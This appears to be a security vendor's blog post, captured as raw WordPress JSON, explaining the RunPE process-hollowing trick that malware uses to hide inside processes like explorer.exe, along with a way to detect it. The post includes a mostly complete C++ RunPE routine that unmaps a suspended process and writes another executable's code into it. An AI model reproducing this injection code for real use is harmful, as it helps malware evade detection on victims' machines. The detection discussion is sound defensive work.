Hiding a process<\/strong> has always being challenging for malware writers, and they found many ways to do so. The tip I’ll talk about is very basic, yet simple to write, but doesn’t work all the time. This trick is known under the name “RunPE”<\/strong> and has been used many time in malware industry, especially in RATs<\/strong> (Remote Administration Tools).<\/p>\n\n\n\n Basically, when a malware starts, it will pick a victim<\/strong> among the Windows processes (like explorer.exe) and start a new instance<\/strong> of it, in a suspended state<\/strong>. In that state it’s safe to modify and the malware will totally clear it from its code<\/strong>, extend the memory if needed, and copy its own code inside<\/strong>.<\/p>\n\n\n\n Then, the malware will do some magic to adjust the address of entry point<\/strong> as well as the base address and will resume the process<\/strong>. The main program will call RunPe function with explorer.exe as a target, and calc.exe as a source<\/strong>. This will result in running calc.exe code into an explorer.exe “skin”<\/strong>.<\/p>\n\n\n\n The RunPe function will simply create explorer.exe in a suspended state<\/strong>, remove the sections belonging to that module<\/strong> with NtUnmapViewOfSection<\/a>. Then it will allocate more memory at the same preferred address as the former unmapped sections<\/strong> to host the target (calc.exe) code.<\/p>\n\n\n\n That code (header + sections) is copied into the newly allocated section<\/strong>, and we adjust the image base + entry point address to match the new offset<\/strong> (explorer.exe base may be different). To finish, the main thread is resumed<\/strong>.<\/p>\n\n\n\n As this trick is simple, it’s also simple to detect<\/strong>. We can assume safely (except for .NET assemblies) that a PE Header will be 99% the same in memory and in the disk image of a process<\/strong>.<\/p>\n\n\n\n Knowing that, we can then compare in each process the PE header of the file on disk with the image in memory<\/strong>. If there’s too much differences, we can safely assume the process is hijacked<\/strong>. RogueKiller<\/a> in version 10.8.3 is able to detect RunPE injection<\/strong>.<\/p>\n\n\n\n RunPE: How to hide code behind a legit process – RunPE is a trick used by some malware to hide code into a legit process. Learn how to detect.<\/p>\n","protected":false},"author":1,"featured_media":336,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36,84],"tags":[7,150,152,6,88,303],"class_list":["post-335","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-analysis","category-tutorial","tag-analysis","tag-injection","tag-payload","tag-pe","tag-portable-executable","tag-runpe","category-36","category-84","description-off"],"views":27532,"yoast_score":67,"yoast_readable":30,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/CHILIDnWQAA4AqS.png-large.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"},"yoast_head":"\n
After being resumed, the process shows being started from a file (explorer.exe) that has nothing to do anymore with what it actually does<\/strong>.<\/p>\n\n\n\n
RunPE: Code<\/h4>\n\n\n\nvoid RunPe( wstring const& target, wstring const& source )\n{\n Pe src_pe( source ); \/\/ Parse source PE structure\n if ( src_pe.isvalid )\n { \n Process::CreationResults res = Process::CreateWithFlags( target, L\"\", CREATE_SUSPENDED, false, false ); \/\/ Start a suspended instance of target\n if ( res.success )\n {\n PCONTEXT CTX = PCONTEXT( VirtualAlloc( NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE ) ); \/\/ Allocate space for context\n CTX->ContextFlags = CONTEXT_FULL;\n\n if ( GetThreadContext( res.hThread, LPCONTEXT( CTX ) ) ) \/\/ Read target context\n {\n DWORD dwImageBase;\n ReadProcessMemory( res.hProcess, LPCVOID( CTX->Ebx + 8 ), LPVOID( &dwImageBase ), 4, NULL ); \/\/ Get base address of target\n \n typedef LONG( WINAPI * NtUnmapViewOfSection )(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection xNtUnmapViewOfSection;\n xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA(\"ntdll.dll\"), \"NtUnmapViewOfSection\"));\n if ( 0 == xNtUnmapViewOfSection( res.hProcess, PVOID( dwImageBase ) ) ) \/\/ Unmap target code\n {\n LPVOID pImageBase = VirtualAllocEx(res.hProcess, LPVOID(dwImageBase), src_pe.NtHeadersx86.OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); \/\/ Realloc for source code\n if ( pImageBase )\n {\n Buffer src_headers( src_pe.NtHeadersx86.OptionalHeader.SizeOfHeaders ); \/\/ Read source headers\n PVOID src_headers_ptr = src_pe.GetPointer( 0 );\n if ( src_pe.ReadMemory( src_headers.Data(), src_headers_ptr, src_headers.Size() ) )\n {\n if ( WriteProcessMemory(res.hProcess, pImageBase, src_headers.Data(), src_headers.Size(), NULL) ) \/\/ Write source headers\n {\n bool success = true;\n for (u_int i = 0; i < src_pe.sections.size(); i++) \/\/ Write all sections\n {\n \/\/ Get pointer on section and copy the content\n Buffer src_section( src_pe.sections.at( i ).SizeOfRawData );\n LPVOID src_section_ptr = src_pe.GetPointer( src_pe.sections.at( i ).PointerToRawData );\n success &= src_pe.ReadMemory( src_section.Data(), src_section_ptr, src_section.Size() ); \n\n \/\/ Write content to target\n success &= WriteProcessMemory(res.hProcess, LPVOID(DWORD(pImageBase) + src_pe.sections.at( i ).VirtualAddress), src_section.Data(), src_section.Size(), NULL);\n }\n\n if ( success )\n {\n WriteProcessMemory( res.hProcess, LPVOID( CTX->Ebx + 8 ), LPVOID( &pImageBase), sizeof(LPVOID), NULL ); \/\/ Rewrite image base\n CTX->Eax = DWORD( pImageBase ) + src_pe.NtHeadersx86.OptionalHeader.AddressOfEntryPoint; \/\/ Rewrite entry point\n SetThreadContext( res.hThread, LPCONTEXT( CTX ) ); \/\/ Set thread context\n ResumeThread( res.hThread ); \/\/ Resume main thread\n } \n }\n } \n }\n }\n }\n\n if ( res.hProcess) CloseHandle( res.hProcess );\n if ( res.hThread ) CloseHandle( res.hThread );\n }\n }\n}\n...\nRunPe( L\"C:\\\\windows\\\\explorer.exe\", L\"C:\\\\windows\\\\system32\\\\calc.exe\" );<\/code><\/pre>\n\n\n\n
The source code is self explaining<\/strong>, however I chose to let it strongly tied to our underlying library (Pe, Process, …) so that the code will not work out of the box (to avoid script kiddies using it for bad things). An advised engineer will be however able to understand the logic and recreate the binary.<\/p>\n\n\n\n
RunPE: Results<\/h4>\n\n\n\n![\"After](\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/suspended.png\")
<\/a>![\"After](\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/unmapped.png\")
<\/a>![\"After](\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/newsection.png\")
<\/a>![\"After](\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/written.png\")
<\/a>![\"](\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/windows.png\")
<\/a>![\"RunPE](\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/CHILIDnWQAA4AqS.png-large.png\")
<\/a>
RunPE: Detection<\/h4>\n\n\n\n![\"RunPE](\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/CHITo1hWkAABRhF.png-large.png\")
<\/a>
Links<\/h4>\n\n\n\n\n